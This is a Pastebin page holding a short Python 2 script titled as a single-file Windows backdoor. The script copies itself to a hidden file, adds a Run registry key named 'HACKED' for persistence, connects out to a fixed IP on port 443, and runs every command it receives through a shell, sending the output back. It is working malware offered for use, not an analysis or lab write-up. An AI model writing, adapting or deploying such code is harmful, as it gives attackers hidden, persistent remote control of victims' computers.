Advertisement
johnmahugu

python - singlefile backdoor

Jul 6th, 2015
507
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. import socket,subprocess,os,_winreg,win32api,win32con,shutil
  2.  
  3. class B3mB4m:
  4.      def __init__(self):
  5.           self.HOST = '192.168.2.8'  
  6.           self.PORT = 443
  7.           self.backdoorpath = "C:\\backdoor.py"
  8.           self.copyhimself = shutil.copy("backdoor.py", self.backdoorpath)
  9.           win32api.SetFileAttributes(self.backdoorpath,win32con.FILE_ATTRIBUTE_HIDDEN)
  10.           self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  11.           self.s.connect((self.HOST, self.PORT))
  12.           self.key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",
  13.           0, _winreg.KEY_ALL_ACCESS)
  14.           _winreg.SetValueEx(self.key, "HACKED", 0, _winreg.REG_SZ, self.backdoorpath)
  15.           self.key.Close()
  16.  
  17.      def run(self):
  18.           self.s.send('Connection complate ! \n')
  19.           try:
  20.                while 1:
  21.                     self.s.send('>>>  ')
  22.                     data = self.s.recv(1024)
  23.                     proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
  24.                     stdin=subprocess.PIPE)
  25.                     stdout_value = proc.stdout.read() + proc.stderr.read()
  26.                     self.s.send(stdout_value)
  27.                self.s.close()
  28.           except:
  29.                print "Connection losting .. "
  30.                sys.exit()
  31.  
  32. if __name__ == '__main__':
  33.     op = B3mB4m()
  34.     op.run()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement